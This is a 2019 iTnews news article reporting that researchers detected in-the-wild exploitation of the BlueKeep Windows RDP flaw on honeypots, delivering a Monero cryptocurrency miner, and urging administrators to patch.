iTnews

Researchers spot BlueKeep worm hitting honeypots

By Juha Saarinen on Nov 4, 2019 7:08AM
Researchers spot BlueKeep worm hitting honeypots

Yet to hit Australia.

Security researchers are seeing the first indications of self-replicating malware or worms exploiting unpatched Windows systems vulnerable to the BlueKeep remote desktop protocol flaw.

Over the weekend, well-known OpenSecurity.global researcher Kevin Beaumont tweeted that his EternalPot RDP honeypots had started crash with Windows Blue Screen of Death (BSoD) in all regions they were deployed in bar Australia.

Honeypots are systems specifically set up by security researchers to catch exploit attempts.

Marcus Hutchins, a researcher who rose to instant fame after mitigating the destructive WannaCry ransomware attack and his arrest by United States authorities afterwards for alleged malware dissemination, chipped in with a preliminary analysis of the crashes.

Hutchins suspected they're due to a BlueKeep worm making the rounds.

It looks like a #BlueKeep worm has finally arrived! Kevin kindly sent me a crash dump and after some investigation I found BlueKeep artifacts in memory and shellcode to drop a Monero Miner. https://t.co/7G88YAW5lr

— MalwareTech (@MalwareTechBlog) November 2, 2019

Further analysis by Hutchins confirmed that this is a BlueKeep exploit, arriving some six months after the vulnerability was published.

The malicious code delivered by the worm downloads and executes a series of encoded Windows PowerShell commands.

These fetch another payload, an executable that runs a miner for the Monero crypto-currency.

Beaumont later said that "we found definite BlueKeep exploitation in wild across every country with a RDP honeypot (except Australia)."

He added in a blog post that there are over 724,000 internet-accessible systems that are not patched against the BlueKeep vulnerability.

Administrators should also patch internal systems against BlueKeep, as history has shown that worms can spread to these as well.

Microsoft has warned that the BlueKeep vulnerability is extremely serious, and could lead to another WannaCry malware epidemic, or worse.

Patches have been issued for vulnerable Windows systems, including Windows XP and Windows Server 2003, both of which are long out of support.

The Australian Cyber Security Centre has urged administrators to apply the available patches. as soon as possible.

Got a news tip for our journalists? Share it with us anonymously here.
Copyright © iTnews.com.au . All rights reserved.
Tags:
bluekeep kevin beaumont marcus hutchins rdp remote desktop protcol security

Partner Content

What is zero trust cybersecurity?
Partner Content What is zero trust cybersecurity?
Shut the door on ransomware
Promoted Content Shut the door on ransomware
Preventing cybercrime in the world of forex trading
Promoted Content Preventing cybercrime in the world of forex trading
As Australian companies lean more heavily on the cloud, edge security is finding its stride
Partner Content As Australian companies lean more heavily on the cloud, edge security is finding its stride

Sponsored Whitepapers

The top 5 tech trends to deliver business outcomes
The top 5 tech trends to deliver business outcomes
10 reasons why businesses need to invest in cloud security training
10 reasons why businesses need to invest in cloud security training
Your guide to application security solutions
Your guide to application security solutions
State of Software Security: Open Source Edition
State of Software Security: Open Source Edition
Five questions to ask before you upgrade to a SIEM solution
Five questions to ask before you upgrade to a SIEM solution

Events

  • On-Demand Webinar: How Poly and Microsoft are Embracing Future Work Environments
  • [iTnews and Micro Focus] Navigating the cloud modernisation minefield
By Juha Saarinen
Nov 4 2019
7:08AM
0 Comments

Related Articles

  • Mystery actor disrupts Emotet malware distribution botnet
  • Beware human-operated ransomware campaigns: Microsoft
  • 86 400 looks to strengthen customer sign-up process
  • Britain's GCHQ cyber spies embrace the AI revolution
Share on Twitter Share on Facebook Share on LinkedIn Share on Whatsapp Email A Friend

Most Read Articles

TPG Telecom to start enticing NBN customers to move

TPG Telecom to start enticing NBN customers to move

Infosys scores another $40m for Centrelink payments engine build

Infosys scores another $40m for Centrelink payments engine build

Telstra InfraCo opens up telco's own fibre network

Telstra InfraCo opens up telco's own fibre network

Transport for NSW data stolen in Accellion breach

Transport for NSW data stolen in Accellion breach

You must be a registered member of iTnews to post a comment.
Log In | Register
All rights reserved. This material may not be published, broadcast, rewritten or redistributed in any form without prior authorisation.
Your use of this website constitutes acceptance of nextmedia's Privacy Policy and Terms & Conditions.